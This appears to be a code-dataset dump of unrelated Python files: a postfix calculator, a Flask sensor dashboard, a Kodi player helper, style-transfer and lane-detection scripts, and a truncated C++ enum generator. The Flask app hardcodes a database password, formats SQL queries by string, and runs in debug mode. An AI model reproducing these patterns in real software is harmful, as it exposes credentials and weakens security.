depth=2).json().get(\n 'nodes')[1].get('childNodes')]\n","sub_path":"py/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"5948726","text":"import operator #make use of operator module to perform arithmetic operations\nimport decimal #make use of decimal module to convert string to decimal\n\n# class Empty to raise an exception code from the book \"Data Structure and Algorithms in Python\"\nclass Empty(Exception):\n \"\"\"Error attempting to access an element from an empty container.\"\"\"\n pass\n\n# class ArrayStack code from chapter6.1 in the book \"Data Structure and Algorithms in Python\"\nclass ArrayStack:\n \"\"\"LIFO Stack implementation using a Python list as underlying stoarge.\"\"\"\n \n def __init__(self):\n \"\"\"Create an empty stack.\"\"\"\n self._data=[] # nonpublic list instance\n \n \"\"\"--str-- method to return elements in Array\"\"\"\n def __str__(self):\n return ' '.join(map(str, self._data))\n \n def __len__(self):\n \"\"\"Return the number of elements in the stack.\"\"\"\n return len(self._data)\n \n def is_empty(self):\n \"\"\"Return True if the stack is empty.\"\"\"\n return len(self._data)==0\n \n def push(self,e):\n \"\"\"Add element e to the top of the stack.\"\"\"\n self._data.append(e) # new item stored at the end of list\n \n def top(self):\n \"\"\"Return (but do not remove) the element at the top of the stack.\n \n Raise Empty exception if the stack is empty.\n \"\"\"\n \n if self.is_empty():\n raise Empty('Stack is empty')\n return self._data[-1]\n \n def pop(self):\n \"\"\"Remove and return the element fomr the top of the stack (i.e., LIFO)\n \n Raise Empty exception if the stack is empty.\n \"\"\"\n \n if self.is_empty():\n raise Empty('Stack is empty')\n return self._data.pop() #remove last item from list\n \n#function to perform calculation based on postfix notations\n\ndef postfix_calc(expr):\n\n operands = '+-*/' #allowable operands\n \n S = ArrayStack() #create a stack\n \n expr = expr.split(\" \") #save string into a list, split by a space\n \n for c in range(len(expr)): #go over each element in the list\n \n if expr[c] not in operands:\n #If the element is number, add it to the stack\n S.push(expr[c])\n \n elif expr[c] in operands:\n #If the element is an operator, perform that operation given the latest two elements in the stack\n #Given stack is a LIFO, the last element in stack is popped as expression 2, followed by another pop for expression 1\n expr2 = decimal.Decimal(S.pop())\n expr1 = decimal.Decimal(S.pop())\n\n if expr[c]=='+':\n #if '+', then add expr2 to expr1, then push the result to the stack\n S.push(operator.add(expr1, expr2))\n \n elif expr[c]=='-':\n #if '-', then subtract expr2 from expr1, then push the result to the stack\n S.push(operator.sub(expr1, expr2))\n \n elif expr[c]=='*':\n #if '*', then multiply expr1 with expr1, then push the result to the stack\n S.push(operator.mul(expr1, expr2))\n \n elif expr[c]=='/':\n #if '/', then divide expr1 with expr2, then push the result to the stack\n S.push(operator.truediv(expr1, expr2))\n \n return S.pop() #pop the last element in the stack, which is the final outcome\n \n\n# Specify output file path and filename\ninput_file_path = \"/Users/plodium2000/Documents/All Documents/Profile/EM/Education/Berkeley/MIDS Program/Courses/Data Structure and Algorithm/1B_assignments_2016_11_10/Assignment_4/Wongnophadol_week4/input.txt\"\n\n# Specify output file path and filename\noutput_file_path = \"/Users/plodium2000/Documents/All Documents/Profile/EM/Education/Berkeley/MIDS Program/Courses/Data Structure and Algorithm/1B_assignments_2016_11_10/Assignment_4/Wongnophadol_week4/output.txt\"\n\n# Read the input file and write out scrambled message of each line into the output file.\nwith open(input_file_path,'rt') as input_file, open(output_file_path,'wt') as output_file:\n for line in input_file:\n # Print statements to quickly test the accuracy of the program.\n print(line.rstrip())\n print(str(postfix_calc(line.rstrip()))+\"\\n\")\n \n # Write out the scrambled messages to the output file.\n output_file.write(str(postfix_calc(line.rstrip()))+\"\\n\")\n ","sub_path":"Data Structure and Algorithm/Assignment_4/Wongnophadol_week4/postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"625488162","text":"from flask import Flask\nfrom flask import flash, render_template, request, redirect, send_from_directory, jsonify\nimport MySQLdb\nimport os\nfrom datetime import datetime, timedelta\nfrom collections import OrderedDict\nimport json\n\napplication = Flask(__name__)\nsensorMac = \"b8:27:eb:54:2c:38\"\nconfig = {\"height\": 80, \"floors\": {4: {\"ec:fa:bc:e:a6:95_1\": \"general\", \"ec:fa:bc:e:a6:95_2\": \"general\", \"ec:fa:bc:e:a6:95_3\": \"glass\", \"ec:fa:bc:e:a6:95_4\": \"paper\"}}}\nra_config = {\"floors\": {4: {sensorMac: \"general\"}}}\n\n@application.route(\"/\")\ndef index():\t\n templateData = get_template_data()\n return render_template('index.html', **templateData)\n\n\n@application.route(\"/ra\")\ndef ra():\n templateData = get_ra_template_data()\n return render_template('roomavailability.html', **templateData)\n\n\n@application.route(\"/rs\")\ndef rs():\n templateData = get_ra_template_data()\n return render_template('roomstatus.html', **templateData)\n\n\ndef from_date(time_scale):\n # WIP: while sensors are offline, we are using old data\n # datetime_now = datetime.now()\n datetime_now = datetime(2018, 9, 23, 10, 13, 13)\n if time_scale == \"month\":\n min_date = datetime_now - timedelta(days=30)\n elif time_scale == \"week\":\n min_date = datetime_now - timedelta(days=7)\n elif time_scale == \"3_days\":\n min_date = datetime_now - timedelta(days=3)\n else:\n min_date = datetime_now - timedelta(days=1)\n return min_date\n\n\n@application.route('/ra/date/', methods=['POST'])\ndef get_ra_graph_data():\n time_scale = request.form.get(\"time_scale\", \"month\")\n data = get_ra_template_data(from_date(time_scale))\n data = {\"time_scale\": json.dumps(data)}\n data = jsonify(data)\n return data\n\n\n@application.route('/date/', methods=['POST'])\ndef get_graph_data():\n time_scale = request.form.get(\"time_scale\", \"month\")\n data = get_template_data(from_date(time_scale))\n data = {\"time_scale\": json.dumps(data)}\n data = jsonify(data)\n return data\n\n\n@application.route('/static/')\ndef send_ota(path):\n return send_from_directory('static', path)\n\n\ndef get_ra_template_data(date=None):\n template_data = {'ra_config': ra_config}\n user = \"remote-admin\"\n passwd = \"Some-pass!23\"\n db_host = os.environ[\"MYSQL_SERVICE_HOST\"]\n db_name = \"room-availability\"\n db = MySQLdb.connect(host=db_host, user=user, passwd=passwd, db=db_name)\n cur = db.cursor()\n if date is None:\n mysql_string = \"SELECT * FROM `sensor_data` ORDER BY timestamp DESC LIMIT 20\"\n else:\n mysql_string = \"SELECT * FROM `sensor_data` WHERE timestamp > '{}' ORDER BY timestamp DESC\".format(date)\n cur.execute(mysql_string)\n db_data = cur.fetchall()\n parsed_data = OrderedDict()\n for (id, mac_id, data, datetime_object) in db_data:\n date_time = datetime_object.strftime(\"%Y-%m-%d %H:%M:%S\")\n if date_time in parsed_data:\n parsed_data[date_time].update({mac_id: {\"data\": data}})\n else:\n parsed_data.update({ date_time: {mac_id: {\"data\": data}}})\n filtered_data = OrderedDict()\n for i in parsed_data:\n #if len(parsed_data[i]) == 1:\n filtered_data.update({i: parsed_data[i]})\n data_dictionary = OrderedDict(sorted(filtered_data.items()))\n if data_dictionary.get(next(reversed(data_dictionary))).get(sensorMac).get('data') == 1.0:\n template_data['status'] = \"RoomIsBusy\"\n else:\n template_data['status'] = \"RoomIsFree\"\n template_data['busyness_data'] = data_dictionary\n return template_data\n\n\ndef get_template_data(date=None):\n templateData = {'config': config}\n user = \"remote-admin\"\n passwd = \"Some-pass!23\"\n bin_height = config[\"height\"]\n db_host = os.environ[\"MYSQL_SERVICE_HOST\"]\n db_name = \"smart-recycling-bins\"\n db = MySQLdb.connect(host=db_host, user=user, passwd=passwd, db=db_name)\n cur = db.cursor()\n# cur.execute(\"\"\"SELECT * FROM `sensor_data` WHERE timestamp < '2018-08-06 09:38:40' ORDER BY timestamp DESC LIMIT 200\"\"\")\n mac_ids = \"('{}')\".format(\"','\".join(config['floors'][4].keys()))\n if date is None:\n mysql_string = \"SELECT * FROM `sensor_data` WHERE `macid` IN {} ORDER BY timestamp DESC LIMIT 1000\".format(mac_ids)\n else:\n mysql_string = \"SELECT * FROM `sensor_data` WHERE timestamp > '{}' AND `macid` IN {} ORDER BY timestamp DESC\".format(date, mac_ids)\n cur.execute(mysql_string)\n data = cur.fetchall()\n parsed_data = OrderedDict()\n fallback_values = {}\n for (id, mac_id, distance, datetime_object) in data:\n # if sensor reported value above 5 cm - record the value so we can fall back to last \"good\" one in case it's below 5\n if distance > 5:\n fallback_values[mac_id] = distance\n else:\n distance = fallback_values[mac_id]\n\n date_time = datetime_object.strftime(\"%Y-%m-%d %H:%M:%S\")\n # reserve the height with bin height from config\n trash_height = bin_height - distance\n if trash_height < 0:\n trash_height = 0\n if date_time in parsed_data:\n parsed_data[date_time].update({mac_id: {\"trash_height\": trash_height}})\n else:\n parsed_data.update({date_time: {mac_id: {\"trash_height\": trash_height}}})\n filtered_data = OrderedDict()\n for i in parsed_data:\n if len(parsed_data[i]) == 4:\n filtered_data.update({i: parsed_data[i]})\n\n templateData['distance_data'] = OrderedDict(sorted(filtered_data.items()))\n return templateData\n\n\n@application.route(\"/db\")\ndef db_records():\n user = \"remote-admin\"\n passwd = \"Some-pass!23\"\n db_host = os.environ[\"MYSQL_SERVICE_HOST\"]\n db_name = \"smart-recycling-bins\"\n db = MySQLdb.connect(host=db_host, user=user, passwd=passwd, db=db_name)\n cur = db.cursor()\n mysql_string = \"SELECT * FROM (SELECT * FROM `sensor_data` ORDER BY id DESC LIMIT 100) sub ORDER BY id DESC\"\n cur.execute(mysql_string)\n data = list(cur.fetchall())\n parsed_data = []\n for (id, mac_id, distance, datetime_object) in data:\n parsed_data.append((id, mac_id, distance, datetime_object.strftime(\"%Y-%m-%d %H:%M:%S\")))\n return render_template('db.html', data=parsed_data)\n\n\nif __name__ == \"__main__\":\n application.run(debug=True)\n","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"536511332","text":"import util\r\n\r\ndef is_valid(number):\r\n digits = str(number)\r\n valid = False\r\n\r\n for i in range(5):\r\n if digits[i] > digits[i + 1]:\r\n return False\r\n\r\n if digits[i] == digits[i + 1]:\r\n valid = True\r\n\r\n return valid\r\n\r\n\r\n[low, high] = list(map(int, util.read_line(\"input/04.txt\").split(\"-\")))\r\n\r\nresult = sum(1 for num in range(low, high + 1) if is_valid(num))\r\nprint(result)\r\n","sub_path":"04a.py","file_name":"04a.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"607152467","text":"import math\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\n\r\nclass Detect_Draw_lanes():\r\n def __init__(self,image):\r\n self.input_image=image\r\n self.lines=None\r\n self.vertices_img=None\r\n\r\n def region_of_interest(self,img):\r\n \"\"\"\r\n Applies an image mask.\r\n \"\"\"\r\n #defining a blank mask\r\n mask = np.zeros_like(img) \r\n #checking number of image channel(color/grayscale) and applying mask\r\n if len(img.shape) > 2:\r\n ignore_mask_color = (255,255,255)\r\n else:\r\n ignore_mask_color = 255\r\n #filling color to pixels inside the polygon \r\n cv2.fillPoly(mask, self.vertices_img, ignore_mask_color)\r\n #image where mask pixels are nonzero\r\n masked_image = cv2.bitwise_and(img, mask)\r\n #cv2.imshow('',masked_image)\r\n return masked_image\r\n\r\n def makeLeftRightline(self):\r\n \"\"\"\r\n find left and right lane coefficients\r\n \"\"\"\r\n left_lines = []\r\n right_lines = []\r\n for i in self.lines:\r\n for x1,y1,x2,y2 in i:\r\n if x1 == x2:\r\n #Vertical Lines\r\n pass\r\n else:\r\n m = (y2 - y1) / (x2 - x1)\r\n c = y1 - m * x1\r\n if m < 0:\r\n left_lines.append((m,c))\r\n elif m >= 0:\r\n right_lines.append((m,c))\r\n return left_lines,right_lines\r\n\r\n def slope_lines(self,image):\r\n \"\"\"\r\n find mean left and right lane\r\n \"\"\"\r\n img_copy = image.copy()\r\n \r\n left_lines,right_lines=self.makeLeftRightline()\r\n left_line = np.mean(left_lines, axis=0)\r\n right_line = np.mean(right_lines, axis=0)\r\n\r\n poly_vertices = []\r\n order = [0,1,3,2]\r\n\r\n for slope, intercept in [left_line, right_line]:\r\n #getting height of image in y1\r\n rows, cols = image.shape[:2]\r\n y1= int(rows) \r\n #taking y2 upto 68% of y1\r\n y2= int(rows*0.68) \r\n #y=mx +c can be written as x=(y-c)/m\r\n x1=int((y1-intercept)/slope)\r\n x2=int((y2-intercept)/slope)\r\n poly_vertices.append((x1, y1))\r\n poly_vertices.append((x2, y2))\r\n\r\n # DRAWING LINES AND PATH ON THE IMAGE\r\n thickness_of_line=9\r\n color_of_line=[20, 255, 20]\r\n lines=np.array([[[x1,y1,x2,y2]]])\r\n for i in lines:\r\n for x1,y1,x2,y2 in i:\r\n cv2.line(img_copy, (x1, y1), (x2, y2), color_of_line, thickness_of_line)\r\n poly_vertices = [poly_vertices[i] for i in order]\r\n #filling polygon color\r\n cv2.fillPoly(img_copy, pts = np.array([poly_vertices],'int32'), color = (200,20,20))\r\n final_out=cv2.addWeighted(image,0.7,img_copy,0.4,0.)\r\n return final_out\r\n\r\n def hough_lines(self,img, rho, theta, threshold, min_line_len, max_line_gap):\r\n \"\"\" \r\n Returns an image with hough lines drawn.\r\n \"\"\"\r\n self.lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\r\n # Returns a nested list with x1,x2,y1,y2 which are further used to detect the slope and intercept for each line\r\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\r\n line_img = self.slope_lines(line_img)\r\n #cv2.imshow(line_img)\r\n return line_img\r\n\r\n def main(self): \r\n #Grayscale\r\n image=self.input_image\r\n gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\r\n #Gaussian Smoothing\r\n smoothed_img = cv2.GaussianBlur(gray_img, (5, 5), 0)\r\n #Canny Edge Detection\r\n canny_img = cv2.Canny(smoothed_img, 180, 240)\r\n\r\n # defining vertices of image\r\n rows, cols = image.shape[:2]\r\n bottom_left = [cols*0.15, rows]\r\n top_left = [cols*0.45, rows*0.6]\r\n bottom_right = [cols*0.95, rows]\r\n top_right = [cols*0.55, rows*0.6] \r\n self.vertices_img = np.array([[bottom_left, top_left, top_right, bottom_right]], dtype=np.int32)\r\n\r\n #Masked Image Within a Polygon\r\n masked_img = self.region_of_interest(img = canny_img)\r\n #Hough Transform Lines\r\n houghed_lines = self.hough_lines(img = masked_img, rho = 1, theta = np.pi/180, threshold = 40, min_line_len = 20, max_line_gap = 180)\r\n #Draw lines on edges\r\n #output= image * 0.8 + houghed_lines * 1. + 0\r\n output = cv2.addWeighted(image, 0.8, houghed_lines, 1., 0.)\r\n \r\n return output","sub_path":"Lane_detection.py","file_name":"Lane_detection.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"84152017","text":"# -*- coding: utf8 -*-\n# version 1.0.1 par dualB\n\nimport sys,urllib, xbmcgui, xbmcplugin, xbmcaddon,re,cache, xbmc, Item, simplejson\n\n__handle__ = int(sys.argv[1])\n\n\ndef jouer_video(media_uid):\n \"\"\" function docstring \"\"\" \n show = Item.ItemVideo(media_uid)\n \n source = show['source']\n if source!='mnmedia':\n xbmc.executebuiltin('Notification(Source non supportée,Le source %s n''est pas supporté actuellement,,8000)' % simplejson.dumps(source))\n return\n\n m3u8_pl=m3u8(show['sourceId'])\n uri = obtenirMeilleurStream(m3u8_pl) \n\n if uri:\n item = xbmcgui.ListItem(\\\n show['nom'],\\\n iconImage=show['image'],\\\n thumbnailImage=show['fanart'], path=uri)\n\n play_item = xbmcgui.ListItem(path=uri)\n xbmcplugin.setResolvedUrl(__handle__,True, item)\n else:\n xbmc.executebuiltin('Notification(Aucun lien disponible,Incapable d''obtenir lien du vidéo,5000)')\n\ndef m3u8(refID):\n return cache.get_cached_content('https://mnmedias.api.telequebec.tv/m3u8/%s.m3u8' % refID,False)\n\ndef obtenirMeilleurStream(pl):\n \"\"\" function docstring \"\"\"\n maxBW = 0\n bandWidth=None\n uri = None\n for line in pl.split('\\n'):\n \n if re.search('#EXT-X',line):\n bandWidth=None\n try:\n match = re.search('BANDWIDTH=(\\d+)',line)\n bandWidth = int(match.group(1))\n except :\n bandWidth=None\n elif line.startswith('http'):\n if bandWidth!=None:\n if bandWidth>maxBW:\n maxBW = bandWidth\n uri = line\n return uri\n\n","sub_path":"resources/lib/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"86819856","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nn_bins = 100\nAtoms = np.genfromtxt('Val_atoms.txt', dtype='str')\nangle_list = np.loadtxt('Val_angles.txt', dtype=int)\nangle_list = angle_list - 1\n\n\nall_bonds = np.loadtxt('../../Dun_coordinates/all_bonds.txt')\nbond_length_means = np.zeros([all_bonds.shape[0], 4])\nfor i in range(0, all_bonds.shape[0]):\n bond_length_means[i, 0] = np.mean(all_bonds[i, :])\n bond_length_means[i, 1] = np.std(all_bonds[i, :])\n bond_length_means[i, 2] = np.min(all_bonds[i, :])\n bond_length_means[i, 3] = np.max(all_bonds[i, :])\nprint(bond_length_means[0, :])\n\n#all_angles = np.loadtxt('MD_data/all_angles.txt')\nall_angles = np.loadtxt('../../Dun_coordinates/all_angles.txt')\nbond_angle_means = np.zeros([all_angles.shape[0], 4])\nfor i in range(0, all_angles.shape[0]):\n bond_angle_means[i, 0] = np.mean(all_angles[i, :])\n bond_angle_means[i, 1] = np.std(all_angles[i, :])\n bond_angle_means[i, 2] = np.min(all_angles[i, :])\n bond_angle_means[i, 3] = np.max(all_angles[i, :])\n\n\nall_bonds = np.loadtxt('../MD_data/all_bonds.txt')\nbond_length_means_MD = np.zeros([all_bonds.shape[0], 4])\nfor i in range(0, all_bonds.shape[0]):\n bond_length_means_MD[i, 0] = np.mean(all_bonds[i, :])\n bond_length_means_MD[i, 1] = np.std(all_bonds[i, :])\n bond_length_means_MD[i, 2] = np.min(all_bonds[i, :])\n bond_length_means_MD[i, 3] = np.max(all_bonds[i, :])\n\nbond_length_means_MD = np.loadtxt('../MD_data/bond_length_means.txt')\n\n#all_angles = np.loadtxt('MD_data/all_angles.txt')\nbond_angle_means_MD = np.loadtxt('../MD_data/bond_angle_means.txt')\n# for i in range(0, all_angles.shape[0]):\n# bond_angle_means_MD[i, 0] = np.mean(all_angles[i, :])\n# bond_angle_means_MD[i, 1] = np.std(all_angles[i, :])\n# bond_angle_means_MD[i, 2] = np.min(all_angles[i, :])\n# bond_angle_means_MD[i, 3] = np.max(all_angles[i, :])\n\n\nind0 = bond_length_means[:, 0] < 3\nsub_means = bond_length_means[ind0, :]\nsub_MD = bond_length_means_MD[ind0, :]\nprint(sub_means.shape[0])\nplt.errorbar(np.arange(0, sub_means.shape[0]), sub_means[:, 0], yerr=sub_means[:, 1], fmt='o')\nplt.errorbar(np.arange(0, sub_MD.shape[0])+.33, sub_MD[:, 0], yerr=sub_MD[:, 1], fmt='x')\nplt.show()\n\n\nind0 = bond_angle_means[:, 0] > 100\nsub_means = bond_angle_means[ind0, :]\nsub_MD = bond_angle_means_MD[ind0, :]\nplt.errorbar(np.arange(1, sub_means.shape[0] + 1), sub_means[:, 0], yerr=sub_means[:, 1], fmt='o', capsize=2, elinewidth=2)\nplt.errorbar(np.arange(1, sub_MD.shape[0]+1) + 0.33, sub_MD[:, 0], yerr=sub_MD[:, 1], fmt='o',capsize=2, elinewidth=2)\nplt.plot([5.7, 5.7], [100, 130], 'k')\nplt.plot([10.7, 10.7], [100, 130], 'k')\nplt.plot([15.7, 15.7], [100, 130], 'k')\nplt.plot([20.7, 20.7], [100, 130], 'k')\nplt.plot([25.7, 25.7], [100, 130], 'k')\nplt.plot([30.7, 30.7], [100, 130], 'k')\nplt.plot([35.7, 35.7], [100, 130], 'k')\n\nplt.show()\nprint(angle_list[ind0, :])\nsub_list = angle_list[ind0, :]\nfor i in range(0, sub_list.shape[0]):\n\tprint(Atoms[sub_list[i, 0]], Atoms[sub_list[i, 1]], Atoms[sub_list[i, 2]])\n\n\n","sub_path":"Code/compare_babl.py","file_name":"compare_babl.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41849875","text":"class Tocka:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return 'Tocka(x={}, y={})'.format(self.x, self.y)\n\n\nclass Premica:\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n\n def __repr__(self):\n return 'Premica(a={}, b={}, c={})'.format(self.a, self.b, self.c)\n\n def pravokotnica(self, tocka):\n a = -self.b\n b = self.a\n c = -(a * tocka.x + b * tocka.y)\n return Premica(a, b, c)\n\n def presecisce(self, other):\n a1, b1, c1 = self.a, self.b, self.c\n a2, b2, c2 = other.a, other.b, other.c\n x = b1 * c2 - b2 * c1\n y = a2 * c1 - a1 * c2\n w = a1 * b2 - a2 * b1\n if w != 0:\n return Tocka(x / w, y / w)\n\n\nt = Tocka(1, 1)\np = Premica(1, 0, 0)\nq = p.pravokotnica(t)\nu = p.presecisce(q)\n","sub_path":"datoteke-s-predavanj/2017-18/09-objekti/staticna-geometrija.py","file_name":"staticna-geometrija.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"579513287","text":"import os\nimport sys\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imshow\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport pprint\nfrom nst_utils import *\nimport imageio\n\n\n# %matplotlib inline\n\n# pp = pprint.PrettyPrinter(indent=4)\n# model = load_vgg_model(\"pre-trained-model/imagenet-vgg-verydeep-19.mat\")\n\n\n# pp.pprint(model)\n\n\n# @ Computing the content cost\n# FUNCTION: compute_content_cost\ndef compute_content_cost(a_C, a_G):\n '''\n\n :param a_C -- the tensor of shape (1, H, W, C), hidden layer activations representing content of the image C\n :param a_G -- the tensor of shape (1, H, W, C), hidden layer activations representing content of the image G\n :return: J_content -- the content cost between image G and image C\n '''\n\n # Retrieve dimensions from a_G\n m, n_H, n_W, n_C = a_G.get_shape().as_list()\n\n # Reshape a_C and a_G\n a_C_unrolled = tf.reshape(a_C, shape=[m, -1, n_C])\n a_G_unrolled = tf.reshape(a_G, shape=[m, -1, n_C])\n\n # Compute the cost\n J_content = tf.reduce_sum(tf.square(tf.subtract(a_C_unrolled, a_G_unrolled))) / (4 * n_H * n_W * n_C)\n\n return J_content\n\n\n# @ Computing the style cost\n# FUNCTION: gram_matrix\ndef gram_matrix(A):\n '''\n\n :param A: matrix of shape (C, H*W)\n :return: Gram matrix of A, of shape (C, C)\n '''\n GA = tf.matmul(A, tf.transpose(A))\n\n return GA\n\n\n# FUNCTION: compute_layer_style_cost\ndef compute_layer_style_cost(a_S, a_G):\n '''\n\n :param a_S: tensor of shape (1, H, W, C), hidden layer activations representing style of the image S\n :param a_G: tensor of shape (1, H, W, C), hidden layer activations representing style of the image G\n :return: J_style_layer: tensor representing style cost of given layer between G and S\n '''\n\n # Retrieve dimensions from a_G\n m, n_H, n_W, n_C = a_G.get_shape().as_list()\n\n # Reshape images to shape (n_C, n_H*n_W)\n a_S = tf.reshape(tf.transpose(a_S, perm=[0, 3, 1, 2]), shape=[n_C, -1])\n a_G = tf.reshape(tf.transpose(a_G, perm=[0, 3, 1, 2]), shape=[n_C, -1])\n\n # Computing gram_matrix for both images S and G\n GS = gram_matrix(a_S)\n GG = gram_matrix(a_G)\n\n # Computing the loss\n J_style_layer = tf.reduce_sum(tf.square(tf.subtract(GS, GG))) / (4 * (n_H * n_W) * (n_H * n_W) * (n_C * n_C))\n\n return J_style_layer\n\n\n# Style weights for different layers\nSTYLE_LAYERS = [\n ('conv1_1', .2),\n ('conv2_1', .2),\n ('conv3_1', .2),\n ('conv4_1', .2),\n ('conv5_1', .2)\n]\n\n\n# FUNCTION: compute_style_cost\ndef compute_style_cost(model, STYLE_LAYERS):\n '''\n\n :param model: the loaded model\n :param STYLE_LAYERS: the weights for style cost of different layers\n :return: style cost\n '''\n\n # initialize the overall style cost\n J_style = 0\n\n for layer_name, coeff in STYLE_LAYERS:\n # Select the output tensor of the currently selected layer\n out = model[layer_name]\n\n # Set a_S to be the hidden layer activation from the layer we have selected, by running the session on out\n a_S = sess.run(out)\n\n # Set a_G to be the hidden layer activation from same layer. Here, a_G references model[layer_name]\n # and isn't evaluated yet. Later in the code, we'll assign the image G as the model input, so that\n # when we run the session, this will be the activations drawn from the appropriate layer, with G as input.\n a_G = out\n\n # Compute style_cost for the current layer\n J_style_layer = compute_layer_style_cost(a_S, a_G)\n\n # Add coeff * J_style_layer of this layer to overall style cost\n J_style += coeff * J_style_layer\n\n return J_style\n\n\n# @ Defining the total cost to optimize\n# FUNCTION: total_cost\ndef total_cost(J_content, J_style, alpha=10, beta=40):\n '''\n\n :param J_content: the content cost between G and C\n :param J_style: the style cost between G and S\n :param alpha: hyperparam. weighting the importance of the content cost\n :param beta: hyperparam. weighting the importance of the style cost\n :return: J: total cost\n '''\n\n J = alpha * J_content + beta * J_style\n\n return J\n\n\n# @ Solve the optimization problem\n# Reset the graph\n# tf.reset_default_graph()\n# Start interactive session\nsess = tf.Session()\n\n# Content image\ncontent_image = imageio.imread('images/louvre_small.jpg')\ncontent_image = reshape_and_normalize_image(content_image)\n\n# Style image\nstyle_image = imageio.imread('images/monet.jpg')\nstyle_image = reshape_and_normalize_image(style_image)\n\n# Initialize generated image correlated with content image\ngenerated_image = generate_noise_image(content_image)\n# imshow(generated_image[0])\n# plt.show()\n\n# Load pre-trained model\nmodel = load_vgg_model(\"pre-trained-model/imagenet-vgg-verydeep-19.mat\")\n\n# content cost\n# Assign the content image to be the input of the model\nsess.run(model['input'].assign(content_image))\n# Select the output tensor of layer conv4_2\nout = model['conv4_2']\n# Set a_C to be the hidden layer activation from the layer we have selected\na_C = sess.run(out)\n# Set a_G to be the hidden layer activation from same layer. Here, a_G references model['conv4_2']\n# and isn't evaluated yet. Later in the code, we'll assign the image G as the model input, so that\n# when we run the session, this will be the activations drawn from the appropriate layer, with G as input.\na_G = out\n# Compute the content cost\nJ_content = compute_content_cost(a_C, a_G)\n\n# style cost\n# Assign the input of the model to be the \"style\" image\nsess.run(model['input'].assign(style_image))\n# Compute the style cost\nJ_style = compute_style_cost(model, STYLE_LAYERS)\n\n# total cost\nJ = total_cost(J_content, J_style, alpha=10, beta=40)\n\n# define optimizer\noptimizer = tf.train.AdamOptimizer(2.0)\n\n# define train_step\ntrain_step = optimizer.minimize(J)\n\n# FUNCTION: model\ndef model_nn(sess, input_image, num_iterations=200):\n # Initialize global variables\n sess.run(tf.global_variables_initializer())\n\n # Run the noisy input image through the model\n sess.run(model['input'].assign(input_image))\n\n for i in range(num_iterations):\n # Run the session on the train_step to minimize the total cost\n sess.run(train_step)\n\n # Compute the generated image by running the session on the current model['input']\n generated_image = sess.run(model['input'])\n\n if i%20 == 0:\n Jt, Jc, Js = sess.run([J, J_content, J_style])\n print(\"Iteration \" + str(i) + \" :\")\n print(\"total cost = \" + str(Jt))\n print(\"content cost = \" + str(Jc))\n print(\"style cost = \" + str(Js))\n\n # save current generated image in the \"/output\" directory\n save_image(\"output/\" + str(i) + \".png\", generated_image)\n\n # save last generated image\n save_image('output/generated_image.jpg', generated_image)\n\n return generated_image\n\nmodel_nn(sess, generated_image)\n\n","sub_path":"neural_styple_transfer.py","file_name":"neural_styple_transfer.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"13277211","text":"import os\r\nimport CppHeaderParser\r\nimport sys\r\nfrom CppHeaderParser import CppHeader\r\nfrom typing import List, Dict\r\nfrom string import Template\r\n\r\n\r\ndef get_cpp_header_info(input_file_path: str) -> CppHeader:\r\n return CppHeaderParser.CppHeader(input_file_path)\r\n\r\n\r\ndef fill(text: str, key_value_pairs: Dict[str, str]) -> str:\r\n return Template(text).substitute(key_value_pairs)\r\n\r\n\r\ndef enum_definitions(cppHeader: CppHeader, is_enum_class: bool) -> List[str]:\r\n def enum_name(name: str) -> str:\r\n if is_enum_class:\r\n return fill(\"enum class $name {\",\r\n {\"name\": name})\r\n else:\r\n return fill(\"enum $name {\",\r\n {\"name\": name})\r\n lines = []\r\n for enum in cppHeader.enums:\r\n lines.append(enum_name(enum[\"name\"]))\r\n n = len(enum[\"values\"])\r\n for index, value in enumerate(enum[\"values\"]):\r\n if index == n - 1:\r\n lines.append(value[\"name\"] + \"=\" + str(value[\"value\"]))\r\n else:\r\n lines.append(value[\"name\"] + \"=\" + str(value[\"value\"]) + \",\")\r\n lines.append(\"};\\n\")\r\n return lines\r\n\r\n\r\ndef enum_to_string(cppHeader, is_enum_class):\r\n func_def = \"\"\"\r\n template <> class Enum<$enum_type> {\r\n public:\r\n static std::string ToString($enum_type value) {\r\n switch (value) {\"\"\"\r\n lines = []\r\n for enum in cppHeader.enums:\r\n lines.append(fill(func_def, {\"enum_type\": enum[\"name\"]}))\r\n for value in enum[\"values\"]:\r\n if is_enum_class:\r\n lines.append(\"case {0}::{1}: return \\\"{0}::{1}\\\";\".format(\r\n enum[\"name\"], value[\"name\"]\r\n ))\r\n else:\r\n lines.append(\"case {0}: return \\\"{0}\\\";\".format(value[\"name\"]))\r\n lines.append(\r\n \"default: return \\\"ENUMERATION VALUE OUT OF 